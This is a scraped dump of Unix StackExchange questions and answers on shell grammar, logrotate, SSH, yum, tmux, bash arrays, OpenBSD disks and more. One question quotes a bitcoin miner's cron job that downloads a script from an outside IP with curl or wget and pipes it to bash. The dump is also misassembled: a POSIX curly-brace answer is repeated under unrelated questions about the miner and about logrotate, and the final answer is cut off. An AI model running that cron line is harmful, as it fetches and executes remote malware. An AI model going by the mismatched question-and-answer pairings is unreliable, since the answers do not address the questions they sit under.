has a reserved word or control operator at the beginning { are defined as reserved word, similar to for or while , listed in Shell Grammar (see the last code block in the question) Section 2.9 states(emphasis added): In particular, the representations include spacing between tokens in some places where <blank> s would not be necessary (when one of the tokens is an operator). While the standard doesn't explicitly define ( as an operator, ( is referred to as operator; specifically, section 2.9.2 says If the pipeline begins with the reserved word ! and command1 is a subshell command, the application shall ensure that the ( operator at the beginning of command1 is separated from the ! by one or more characters. The behavior of the reserved word ! immediately followed by the ( operator is unspecified. Question on Stack Overflow by Digital Trauma points out Section 2.4 on Reserved Words: This recognition shall only occur when none of the characters is quoted and when the word is used as: -The first word of a command As mentioned in Kusalananda's answer "The spaces shown in the POSIX grammar are not spaces that needs to be there in the shell input data, but just a way of displaying the grammar itself. It is the fact that the braces are reserved words that implies that they have to be surrounded by whitespace" As mentioned by Michael Homer in the comments:"If the spaces were significant in their own right, they'd need to be listed in the production " Case closed. | The difference between the curly braces and the parentheses are that the braces (and ! ) are reserved words, just like for , if , then etc. while parentheses are control operators. Words need to be separated by whitespace. This means that just like you can't have foriin*; do you can't have {somecommand;} >file or if !somecommand; then The spaces shown in the POSIX grammar are not spaces that needs to be there in the shell input data, but just a way of displaying the grammar itself. It is the fact that the braces are reserved words that implies that they have to be surrounded by whitespace, while the parentheses of a subshell don't. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526574",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/85039/"
]
} |
526,578 | Hello everyone, My machine has been hijacked by a bitcoin miner. he has a cron job that runs every 2 seconds. Using crontab -e to delete it doesn't work because it respawns soon after. I can't edit it with either nano or vi editor because each time I try he has some code running that kills the either editor as soon as I open them. Below is his cron job: */30 * * * * (curl -s http://192.210.175.103/mr.sh||wget -q -O - http://192.210.175.103/mr.sh)|bash -sh The job is being run from /tmp but the originating file keeps changing. Please any ideas on how to fix this? Thanks | The difference between the curly braces and the parentheses are that the braces (and ! ) are reserved words, just like for , if , then etc. while parentheses are control operators. Words need to be separated by whitespace. This means that just like you can't have foriin*; do you can't have {somecommand;} >file or if !somecommand; then The spaces shown in the POSIX grammar are not spaces that needs to be there in the shell input data, but just a way of displaying the grammar itself. It is the fact that the braces are reserved words that implies that they have to be surrounded by whitespace, while the parentheses of a subshell don't. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526578",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359287/"
]
} |
526,595 | I have below configuration for access logs cat /etc/logrotate.d/logrotate_nginx.conf/nginx/access/logs/*.log { rotate 2 size 1k missingok compress notifempty copytruncate} There is no time interval configuration. This should mean it has rotate logs at '/nginx/access/logs/' after they reach 1 KiloByte right? But this is the log rotation now / # ls -l /nginx/access/logs/total 8-rw-r--r-- 1 root root 1264 Jun 24 11:17 nginx-access.log-rw-r--r-- 1 root root 1292 Jun 24 11:17 nginx-access_withbody.log-rw-r--r-- 1 root root 0 Jun 24 11:16 nginx-error.log This is logrotate.status / # cat /var/lib/logrotate.statuslogrotate state -- version 2"/var/log/acpid.log" 2019-6-24-11:0:0"/mnt/mesos/sandbox/logs/nginx-error.log" 2019-6-24-11:0:0"/mnt/mesos/sandbox/logs/nginx-access.log" 2019-6-24-11:0:0"/mnt/mesos/sandbox/logs/nginx-access_withbody.log" 2019-6-24-11:0:0 I want to know why it is not rotating. If the issue is with conf. And as per document Size size This option is mutuallyexclusive with the time interval options, and it causes logfiles to be rotated without regard for the last rotation time, if specified after the time criteria | The difference between the curly braces and the parentheses are that the braces (and ! ) are reserved words, just like for , if , then etc. while parentheses are control operators. Words need to be separated by whitespace. This means that just like you can't have foriin*; do you can't have {somecommand;} >file or if !somecommand; then The spaces shown in the POSIX grammar are not spaces that needs to be there in the shell input data, but just a way of displaying the grammar itself. It is the fact that the braces are reserved words that implies that they have to be surrounded by whitespace, while the parentheses of a subshell don't. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526595",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359300/"
]
} |
526,653 | I would like to control the screen brightness in i3 , in Intel laptops that come with Fn keys for the purpose. These keys function with any other DE. First making sure devices available are Intel: $ ls -l /sys/class/backlight/total 0lrwxrwxrwx 1 root root 0 juin 24 18:26 intel_backlight -> ../../devices/pci0000:00/0000:00:02.0/drm/card0/card0-eDP-1/intel_backlight In another forum the programme xbacklight is suggested as means to control brightness in i3 . However it fails in the laptops I tried so far: $ xbacklight -inc 10No outputs have backlight property Is there any other way to control brightness in i3 ? | To change your screen brightness, you can use xrandr . In order to do this, you can do: xrandr -q | grep ' connected' | head -n 1 | cut -d ' ' -f1 That will return all the connected monitors (like LVDS-1 or DVI-D-0 for instance). Now, to change the screen brightness do the command (replace the DVI-D-0 by the precedent command output): xrandr --output DVI-D-0 --brightness 0.7 For instance, this command sets the brightness to 70%. I hope it will help ! | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/526653",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/56887/"
]
} |
526,745 | I have two servers hosted in IDC. I can only use ports 20/21/22/23/3389/33101-33109 to establish connections between two servers. The IDC network device will block any other packets whose source or destination port is not in the 20/21/22/23/80/3389/33101-33109 list/range. But the source port of SSH is random. Using the command ssh username @ server -p remote_port one can easily specify a remote port. So is there an ssh command parameter or some other way to specify a local source port so I can use, for example, port 33101 to establish the SSH connection? My network topology is like this: | You can not specify the source port for ssh client. But you can use nc as a proxy, like this: ssh -p 33101 -o 'ProxyCommand nc -p 33101 %h %p' $SERVER_2 From How can i set the source port for SSH on unbuntu server? (on ServerFault) . | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526745",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359405/"
]
} |
526,780 | Changes to /etc/hosts file seem to take effect immediately. I'm curious about the implementation. What magic is used to achieve this feature? Ask Ubuntu: After modifying /etc/hosts which service needs to be restarted? NetApp Support: How the /etc/hosts file works | The magic is opening the /etc/hosts file and reading it: strace -e trace=file wget -O /dev/null http://www.google.com http://www.facebook.com http://unix.stackexchange.com 2>&1 | grep hostsopen("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 5open("/etc/hosts", O_RDONLY|O_CLOEXEC) = 4 The getaddrinfo(3) function, which is the only standard name resolving interface, will just open and read /etc/hosts each time it is called to resolve a hostname. More sophisticated applications which are not using the standard getaddrinfo(3) , but are still somehow adding /etc/hosts to the mix (e.g. the dnsmasq DNS server) may be using inotify(7) to monitor changes to the /etc/hosts files and re-read it only if needed. Browsers and other such applications will not do that. They will open and read /etc/hosts each time they need to resolve a host name, even if they're not using libc's resolver directly, but are replicating its workings by other means. | {
"score": 6,
"source": [
"https://unix.stackexchange.com/questions/526780",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359439/"
]
} |
526,924 | Background: I'm absolutely new to OpenBSD and trying to install OpenBSD 6.5 into Dell G3 3779. At first, the OpenBSD's UEFI bootloader showed that it detected 3 disks, including the bootable USB flash drive. boot > machine diskinfoDisk BlkSiz IoAlign Size Flags Checksumhd0 512 0 28GB 0x4 .... Removablehd1 512 1 931GB 0x0 ....hd2 512 1 119GB 0x0 .... According to the PC spec, it has 128GB SSD and 1TB HDD. So this looked alright. I continued boot and install.. > boot...sd0 as scsibus0 targ 1 lun 0: <ELECOM, MF-HTU3, PMAP> SCSI4 0/direct removable serial.056e....sd0: 29574MB, 512 bytes/sector, 60567552 sectors...Welcome to the OpenBSD/amd64 6.5 installation program.(I)nstall, (U)pgrade, (A)utoinstall or (S)hell? I...... However, at disk settings step, I stopped and wondered that the installer was going to install the OS into the USB drive, not disks in the PC. Available disks are: sd0.Which disk is the root disk? ('?' for details) [sd0] (press enter key)Disk: sd0 geometry: 3770/255/63 [60567552 Sectors]Offset: 0 Signegure: 0xAA55#: id C H S - C H S0: EF 0 1 2 - 0 16 16 [ 64: 960 ] EFI Sys1: 00 0 0 0 - 0 0 0 [ 0: 0 ] unused2: 00 0 0 0 - 0 0 0 [ 0: 0 ] unused3: A6 0 16 17 - 57 92 35 [ 1024: 920512 ] OpenBSD It seemed to show only 1 disk for disk setting, and the sd0 seemed being recoginized as the USB device. Question: Was this right installer's behavior?Or is it right guess that the installer couldn't detect the hard disks although the bootloader could? P.S English is not my native language; please excuse typing, grammar or/and word selecting errors. UPDATE1: 'not configured' lines in dmesg cpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredacpiec at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpicpu at acpi0 not configuredacpitz at acpi0 not configuredacpipwrres at acpi0 not configured"PNP0A08" at acpi0 not configured"INT3403" at acpi0 not configured"INT3403" at acpi0 not configured"INT3403" at acpi0 not configured"INT3450" at acpi0 not configured"DELL0870" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"INT33A1" at acpi0 not configured"MSFT0101" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C0D" at acpi0 not configured"PNP0C0C" at acpi0 not configured"PNP0C0E" at acpi0 not configured"ACPI0003" at acpi0 not configured"PNP0C0A" at acpi0 not configured"INT3305" at acpi0 not configured"INT3400" at acpi0 not configuredvendor "NVIDIA", unknown product 0x1c8c (class display subclass 30, rev 0xa1) at pci1 dev 0 function 0 not configured"Intel UHD Graphics 630" rev 0x00 at pci0 dev 2 function 0 not configured"Intel Core 6G Thermal" rev 0x07 at pci0 dev 4 function 0 not configured"Intel Core GMM" rev 0x00 at pci0 dev 8 function 0 not configuredvendor "Intel", unknown product 0xa36f (class memory subclass RAM, rev 0x10) at pci0 dev 20 function 2 not configured"Intel Dual Band Wireless AC 9560" rev 0x10 at pci0 dev 20 function 3 not configuredvendor "Intel", unknown product 0xa368 (class serial bus unknown subclass 0x00, rev 0x10) at pci0 dev 21 function 0 not configuredvendor "Intel", unknown product 0xa369 (class serial bus unknown subclass 0x00, rev 0x10) at pci0 dev 21 function 1 not configuredvendor "Intel", unknown product 0xa360 (class communications subclass miscellaneous, rev 0x10) at pci0 dev 22 function 0 not configuredvendor "Intel", uknown product 0xa30d (class bridge subclass ISA, rev 0x10) at pci0 dev 31 function 0 not configuredvendor "Intel", uknown product 0xa348 (class multimedia subclass hdaudio, rev 0x10) at pci0 dev 31 function 3 not configuredvendor "Intel", uknown product 0xa323 (class serial bus subclass SMBus, rev 0x10) at pci0 dev 31 function 4 not configuredvendor "Intel", uknown product 0xa324 (class serial bus subclass 0x00, rev 0x10) at pci0 dev 31 function 5 not configured"CNFFH370344001E31F2 Integrated_Webcam_HD" rev 2.00/64.26 addr 2 at uhub0 port 5 not configured"Generic USB2.0-CAW" rev 2.00/39.60 addr 3 at uhub0 port 6 not configured"HTMicroelectronics Goodix Fingerprint Device" rev 2.00/1.00 addr 4 at uhub0 port 9 not configured"vendor 0x0087 product 0x0aaa" rev 2.00/0.02 addr 5 port 14 not configured UPDATE2: All lines in dmesg OpenBSD 6.5 (RAMDISK_CD) #3: Sat Apr 13 14:55:38 MDT 2019 [email protected]:/usr/src/sys/arc/amd64/compile/RAMDISK_CDreal mem = 17016164252 (16227MB)avail mem = 16496480256 (15732MB)mainbus0 at rootbios0 at mainbus0: SMBIOS rev. 3.1 @ 0xe000 (128 entries)bios0: vendor Dell Inc. version “1.4.0” date 09/05/2018bios0: Dell Inc. G3 3779acpi0 at bios0: rev 2acpi0: tables DSDT FACP APIC FPDT FIDT MCFG SSDT SSDT BOOT HPET SSDT UEFI LPIT SSDT SSDT DBGP DBG2 SSDT SSDT MSDM SLIC SSDT SSDT DMAR BGRT UEFI TPM2 SSDTacpimadt0 at acpi0 addr 0xfee00000: PC-AT compatcpu0 at mainbus0: apid 0 (boot processor)cpu0: Intel(R)Core(TM) i7-8750H CPU @ 2.20GHz, 3893.13 MHz, 06-9e-0acpu0: FPU,VME,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT, PSE36,CFLUSH,DS,ACPI,MMX,FXSR,SSE,SSE2,SS,HTT,TM,PBE,SSE3,PCLMUL,DTES46, MWAIT,DS-CPL,VMX,EST,TM2,SSSE3,SDBG,FMA3,CX16,xTPR,PDCM,PCID,SSE4.1, SSE4.2,x2APIC,MOVBE,POPCNT,DEADLINE,AES,XSAVE,AVX,F16C,RDRAND,NXE, PAGE16B,ADTSCP,LONG,LAHF,ABM,3DNOWP,PERF,ITSC,FSGSBASE,SGX,BMI1,AVX2, SMEP,BMI2,EAMS,INVPCID,MPX,RDSEED,ADX,SMAP,CLFLUSHOPT,PT,IBAS,IBPB, STIBP,L1DF,SSBD,SENSOR,AAAT,XSAVEOPT,XSAVEC,XGETBV1,XSAVES,MELTDOWNcpu0: 256KB 64b/line 8-way L21 cachecpu0: apic clock running at 24MHzcpu0: mwait min=64, max=64, C-substates=0.2.1.2.4.1.1.1, IBEcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredcpu at mainbus0: not configuredioapic0 at mainbus0: apid 2 pa 0xfec00000, version 20, 120 pinsacpiprt0 at acpi0: bus 0 (PCI0)acpiprt1 at acpi0: bus 1 (PEG0)acpiprt2 at acpi0: bus -1 (PEG1)acpiprt3 at acpi0: bus -1 (PEG2)acpiprt4 at acpi0: bus -1 (AP01)acpiprt5 at acpi0: bus -1 (AP02)acpiprt6 at acpi0: bus -1 (AP03)acpiprt7 at acpi0: bus -1 (AP04)acpiprt8 at acpi0: bus -1 (AP05)acpiprt9 at acpi0: bus -1 (AP06)acpiprt10 at acpi0: bus -1 (AP07)acpiprt11 at acpi0: bus -1 (AP08)acpiprt12 at acpi0: bus -1 (AP09)acpiprt13 at acpi0: bus -1 (AP10)acpiprt14 at acpi0: bus -1 (AP11)acpiprt15 at acpi0: bus -1 (AP12)acpiprt16 at acpi0: bus -1 (AP13)acpiprt17 at acpi0: bus 59 (AP14)acpiprt18 at acpi0: bus -1 (AP16)acpiprt19 at acpi0: bus -1 (AP17)acpiprt20 at acpi0: bus -1 (AP18)acpiprt21 at acpi0: bus -1 (AP19)acpiprt22 at acpi0: bus -1 (AP20)acpiprt23 at acpi0: bus 2 (AP21)acpiprt24 at acpi0: bus -1 (AP22)acpiprt25 at acpi0: bus -1 (AP23)acpiprt26 at acpi0: bus -1 (AP24)acpiprt27 at acpi0: bus -1 (AP15)acpiec0 at acpi0acpiec at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpipwrres at acpi0 not configuredacpicpu at acpi0 not configuredacpitz at acpi0 not configuredacpipwrres at acpi0 not configured"PNP0A08" at acpi0 not configuredacpicmos0 at acpi0"INT3403" at acpi0 not configured"INT3403" at acpi0 not configured"INT3403" at acpi0 not configured"INT3450" at acpi0 not configured"DELL0870" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"INT33A1" at acpi0 not configured"MSFT0101" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C14" at acpi0 not configured"PNP0C0D" at acpi0 not configured"PNP0C0C" at acpi0 not configured"PNP0C0E" at acpi0 not configured"ACPI0003" at acpi0 not configured"PNP0C0A" at acpi0 not configured"INT3305" at acpi0 not configured"INT3400" at acpi0 not configuredpci0 at mainbus0 bus00:31:5: mem address conflict 0xfe010000/0x1000pchb0 at pci0 dev 0 function 0 "Intel Core 8G Host" rev 0x07ppb0 at cpi0 dev 1 function 0 "Intel Core 6G PCIE" rev 0x07: msipci1 at ppb0 bus 1vendor "NVIDIA", unknown product 0x1c8c (class display subclass 30, rev 0xa1) at pci1 dev 0 function 0 not configured"Intel UHD Graphics 630" rev 0x00 at pci0 dev 2 function 0 not configured"Intel Core 6G Thermal" rev 0x07 at pci0 dev 4 function 0 not configured"Intel Core GMM" rev 0x00 at pci0 dev 8 function 0 not configuredvendor "Intel", unknown product 0xa379 (class DASP subclass miscellaneous, rev 0x10) at pci0 dev 18xhci0 at pci0 dev 20 function 0 vendor "Intel", unknown product 0xa36d rev 0x10: msi, xHCI 1.10usb0 at xhci0: USB revision 3.0uhub0 at usb0 configuration 1 interface 0 "Intel xHCI root hub" rev 3.00/1.00 addr 1vendor "Intel", unknown product 0xa36f (class memory subclass RAM, rev 0x10) at pci0 dev 20 function 2 not configured"Intel Dual Band Wireless AC 9560" rev 0x10 at pci0 dev 20 function 3 not configuredvendor "Intel", unknown product 0xa368 (class serial bus unknown subclass 0x00, rev 0x10) at pci0 dev 21 function 0 not configuredvendor "Intel", unknown product 0xa369 (class serial bus unknown subclass 0x00, rev 0x10) at pci0 dev 21 function 1 not configuredvendor "Intel", unknown product 0xa360 (class communications subclass miscellaneous, rev 0x10) at pci0 dev 22 function 0 not configuredpciide0 at pci0 dev 23 function 0 "Intel 82801HBM RAID" rev 0x10: DMA, channel 0 wired to native-PCI, channel 1 wired to native-PCIpciide0: using apic 2 int 16 for native-PCI interruptppb1 at pci0 dev 27 function 0 vendor "Intel", unknown product 0xa32c rev 0xf0: msipci2 at ppb1 bus 2ppb2 at pci0 dev 29 function 0 vendor "Intel", unknown product 0xa335 rev 0xf0: msipci3 at ppb2 bus 59re0 at pci3 dev 0 function 0 "Realtek 8168" rev 0x15: RTL8168H/8111H (0x5400), msi, address 3c:2c:30:ac:c8:59rgephy0 at re0 phy 7: RTL8251 PHY, rev. 0vendor "Intel", uknown product 0xa30d (class bridge subclass ISA, rev 0x10) at pci0 dev 31 function 0 not configuredvendor "Intel", uknown product 0xa348 (class multimedia subclass hdaudio, rev 0x10) at pci0 dev 31 function 3 not configuredvendor "Intel", uknown product 0xa323 (class serial bus subclass SMBus, rev 0x10) at pci0 dev 31 function 4 not configuredvendor "Intel", uknown product 0xa324 (class serial bus subclass 0x00, rev 0x10) at pci0 dev 31 function 5 not configuredisa0 at mainbus0pckbc0 at isa0 port 0x60/5 irq 1 irq 12pckbd0 at pckbc0 (kbd slot)wskbd0 at pckbd0: console keyboardefifb0 at mainbus0: 1920x1080, 32bppwsdisplay0 at efifb0 mux 1: console (std, vt100 emulation), using wskbd0"CNFFH370344001E31F2 Integrated_Webcam_HD" rev 2.00/64.26 addr 2 at uhub0 port 5 not configured"Generic USB2.0-CAW" rev 2.00/39.60 addr 3 at uhub0 port 6 not configured"HTMicroelectronics Goodix Fingerprint Device" rev 2.00/1.00 addr 4 at uhub0 port 9 not configured"vendor 0x0087 product 0x0aaa" rev 2.00/0.02 addr 5 port 14 not configuredumass0 at uhub0 port 19 configuration 1 interface 0 "ELECOM MF-HTU3" rev 3.10/1.10 addr 6umass0: using SCSI over Bulk-Onlyscsibus0 at umass0: 2 targets, initiator 0sd0 at scsibus0 targ 1 lun 0: <ELECOM, MF-HTU3, PMAP> SCSI4 0/direct removable serial.056e6016774D0C907014sd0: 29574MB, 512 bytes/sector, 60567552 sectorssoftraid0 at rootscsibus1 at softraid0: 256 targetsroot on rd0a swap on rd0b dump on rd0b | As Ze Loff told in a comment, it was the SATA controller setting in Bios. The default was using RAID. I changed it to using AHCI.After that, the kernel detected all drives as the bootloader. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/526924",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/124929/"
]
} |
527,104 | I am using this script on router using Entware to check response of website every 15 min. It only runs once and terminates after the first 15 mins. Why? #! /bin/shfor i in {1..10}do date >> webresp.csv curl -w 'Testing Website Response Time for :%{url_effective}\n\nLookup Time:\t\t%{time_namelookup}\nConnect Time:\t\t%{time_connect}\nPre-transfer Time:\t%{time_pretransfer}\nStart-transfer Time:\t%{time_starttransfer}\n\nTotal Time:\t\t%{time_total}\n' -o /dev/null www.google.com | tee -a webresp.csv sleep 900done | You are using #! /bin/sh . {1..10} is a bash extension, not standard shell. Bash would expand {1..10} into 10 words,for a standard shell it is just one word. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527104",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/353107/"
]
} |
527,171 | I have a RHEL7 server managed by Satellite 6.5. The command yum clean all --verbose shows a yum cache of several Mb for untracked repositories. yum clean all doesn't clean this cache. Is it possible to do so, or the only way is to run rm -rf /var/cache/yum/* && yum check-update ? | There have been a few enhancements to the yum clean all workings in the past (most notably https://bugzilla.redhat.com/show_bug.cgi?id=1357083 ) but you are absolutely right that there are edge cases where yum clean all just doesn't do its job properly. rm -rf /var/cache/yum , albeit nasty, does the trick every time. The man page has a short message on cleaning untracked repos: <...> Also note that untracked (no longer configured) repositories will not be automatically cleaned. and To purge the entire cache in one go, the easiest way is to delete the files manually. Depending on your cachedir configuration, this usually means treating any variables as shell wildcards and recursively removing matching directories. For example, if your cachedir is /var/cache/yum/$basearch/$releasever, then the whole /var/cache/yum directory has to be removed. If you do this, yum will rebuild the cache as required the next time it is run (this may take a while). Regarding the last point about rebuilding taking a long time, you might want to follow rm -rf /var/cache/yum with && yum makecache to properly recreate the directories and avoid long waits on the next yum invocation. Note the difference between makecache and makecache fast though, most don't really know the difference. yum makecache fast only makes sure the repos are current. yum makecache actually downloads the metadata. | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/527171",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/34039/"
]
} |
527,190 | I would like to reduce the size of an ext4 partition from my disk and I would like to know if it is possible that my files become corrupted during the operation ? I learn that ext4 file system use large extents for each file, so is it possible that a file is located at the end of the partition and become corrupted/deleted during the process ? | Yes, it is safe As long as the process is not interrupted by i.e. power loss, your data will be fine. This is what resize2fs is made for. It will move data around so nothing is lost. it will warn you if you attempt something potentially harmful. I used resize2fs numerous times for offline shrinking and never experienced any problems (except human error). | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527190",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359803/"
]
} |
527,241 | I want to add this character at the end of each line in a file: sed -e 's/$/\/$/g' myfile.txt > myfile_new.txt The result add $/ with explicit $ in each line. but I do not want to add $. For example, this is a line in the original file: https://myline I executed the command, the result become: https://myline/$ But I want: https://myline/ What is wrong? Plz note that the file was originally dos type, I convert it to unix using: dos2unix myfile.txt | You just need 's/$/\//' - the $ anchors the pattern to the end of the line, but it's not an actual character that can be replaced. Similarly for ^ . What you're actually matching (and replacing) is the empty pattern anchored at the end of the line. Also as noted by @Phillippos in the comments, the g is unnecessary here: since the expression is anchored, it can only match at one place. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527241",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359699/"
]
} |
527,344 | How to clear both tmux history ( tmux clear-history ) and zsh ( zle clear-screen ) with one key combination? A common way of clearing screen is ^L , and I tried adding the following to .tmux.conf : bind -Troot C-l send-keys C-l\; clear-history So ^L clears the screen, and clears almost all the history, except that last one screen. A subsequent ^L clears it all. Can the same be achieved with one key combination? bind -Troot C-l send-keys C-l\; clear-history\; send-keys C-l\; clear-history doesn't work. Neither the following does: bind -Troot C-l send-keys C-l C-l\; clear-history | I ended up doing this differently, from zsh itself: # ~/.zshrcclear-scrollback-and-screen () { zle clear-screen tmux clear-history}zle -N clear-scrollback-and-screenbindkey -v '^L' clear-scrollback-and-screen For one single reason - I had a C-l mapping in Vim, and the occasional press was clearing Vim screen. There's a shortcoming to that solution though, it only works in the shell. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527344",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/9781/"
]
} |
527,356 | Say one have a function/method foo . Can one use the local keyword to declare multiple variables in one line, or do they have to be separated by one declare statement for each variable? foo(){ local x y z} or foo(){ local x local y local z} And further: foo(){ local -i x -a y z}foo(){ local -i x=2 -a y=() z}… or the equivalent one by one line declaration. Yes. Could test, but for one I can not find any Q/A on this, and second – there might be some hidden caveats | Yes you can. A possible caveat is SC2155 in that you should declare and assign separately. That being said it will work except for using multiple declare options between the parameters. Also note that the declare parameters will apply to all variables (in this case -i ). script0: #!/bin/bashdeclare a b ca=foob=barc=bazfoo () { local a=1 b=2 c=3 echo "From within func:" declare -p a declare -p b declare -p c}fooecho "From outside func:"declare -p adeclare -p bdeclare -p c Output: $ ./script.shFrom within func:declare -- a="1"declare -- b="2"declare -- c="3"From outside func:declare -- a="foo"declare -- b="bar"declare -- c="baz" script1: #!/usr/bin/env bashdeclare -i a -a b ca=foob=(bar)c=bazfoo () { local -i a=1 -a b=(2) c=3 echo "From within func:" declare -p a declare -p b declare -p c}fooecho "From outside func:"declare -p adeclare -p bdeclare -p c Output: $ ./script.sh./script.sh: line 3: declare: `-a': not a valid identifier./script.sh: line 9: local: `-a': not a valid identifierFrom within func:declare -i a="1"declare -ai b=([0]="2")declare -i c="3"From outside func:declare -i a="0"declare -ai b=([0]="0")declare -i c="0" | {
"score": 5,
"source": [
"https://unix.stackexchange.com/questions/527356",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/140633/"
]
} |
527,411 | If i have an array like arr[0]=2019-06-26arr[1]=15:21:54 How can i convert that into a string whose value is '2019-06-26 15:21:54' | If the first character of IFS variable is a space (which it is by default), you can use the star index in double quotes. #! /bin/basharr[0]=2019-06-26arr[1]=15:21:54string="${arr[*]}"printf "'%s'" "$string" Documented under Special Parameters : When the expansion occurs within double quotes, it expands to a single word with the value of each parameter separated by the first character of the IFS special variable. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527411",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/232623/"
]
} |
527,415 | When opening a file using vim, even if the file doesn't exist, vim is opening a blank file under the name that I pass as param. How can I make vim to open a file only if it exists? | If the first character of IFS variable is a space (which it is by default), you can use the star index in double quotes. #! /bin/basharr[0]=2019-06-26arr[1]=15:21:54string="${arr[*]}"printf "'%s'" "$string" Documented under Special Parameters : When the expansion occurs within double quotes, it expands to a single word with the value of each parameter separated by the first character of the IFS special variable. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527415",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/333826/"
]
} |
527,422 | I want to write a script where I can configure the settings in pavucontrol programmatically. It was suggested that I use pactl . I am quite lost on the options and I would like to know how the Tabs and options from in pavucontrol UI translate to pactl options? | You can't "control pavucontrol from the command line". You can control Pulseaudio with pavucontrol , or you can control Pulseaudio with pactl (or pacmd ). pactl has a limited set of commands, pacmd follows the general CLI syntax (see man 5 pulse-cli-syntax or do pacmd --help ). Changing "Analog Stereo Output" is IIRC done by changing the profiles, see set-card-profile . You'll still need other commands to identify your card etc. If you want to change profiles by default, the Pulseaudio configuration files might be a better place to look. Yes, it's quite complicated compared to pavucontrol , and will require a bit of reading and experimenting. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527422",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/11116/"
]
} |
527,423 | journalctl has the -o short-unix flag that I can use to change the output date format on stuff like -t systemd-sleep. But the only way I've found to list boots is --list-boots , and this doesn't seem to obey the -o flag. Is there a way to make journalctl list boots with unix timestamps? Since systemd is here to stay I fear other methods might break in the future, but I'm open to those suggestions too. | You can't "control pavucontrol from the command line". You can control Pulseaudio with pavucontrol , or you can control Pulseaudio with pactl (or pacmd ). pactl has a limited set of commands, pacmd follows the general CLI syntax (see man 5 pulse-cli-syntax or do pacmd --help ). Changing "Analog Stereo Output" is IIRC done by changing the profiles, see set-card-profile . You'll still need other commands to identify your card etc. If you want to change profiles by default, the Pulseaudio configuration files might be a better place to look. Yes, it's quite complicated compared to pavucontrol , and will require a bit of reading and experimenting. | {
"score": 4,
"source": [
"https://unix.stackexchange.com/questions/527423",
"https://unix.stackexchange.com",
"https://unix.stackexchange.com/users/359245/"
]
} |
527,493 | I have 25 related pairs of files in a folder called Data. These files are named tcr1_r1.txt and tcr1_r2.txt , tcr2_r1.txt and tcr2_r2.txt , and so on until I reach tcr25… (or how many files pairs I have). My problem is that I need to pair them up and run a command on each pair in a batch file. Example: command tcr1_r1.txt tcr2_r2.txt command tcr2_r1.txt tcr2_r2.txt How can I do this? I'm thinking a loop, but I can't seem to be able to separate and alternate the files on each command. I tried a nested loop but that just runs each "r1" file with all the "r2" files. for filename1 in /Data/*_r1.txtdo for filename2 in /Data/*_r2.txt do echo "$filename1 and $filename2" donedone I have tried to use Jeff Schaller’s answer . Here are the exact shell file lines I tried: #!/bin/bashfor first in /mnt/data/Sequencing_core/Data/Raw_data/062419_TCRB_Vanessa_Danielle/20190624_FS10000703_3_BPC29606-1232/Alignment_1/20190625_132145/Fastq/*R1_001.fastq.gzdo echo "$first" echo "${first/_R1_001.fastq.gz/_R2_001.fastq.gz}" done I must be missing something. I’m getting a "Bad substitution" error message. | Two ways, depending on whether you want to care about the total number of files. In the first way, you know the number of files is 25 (specifically named with 1 through 25): for index in {1..25}do command tcr"${index}"_r1.txt tcr"${index}"_r2.txtdone Above, the (bash) shell expands the {1..25} to 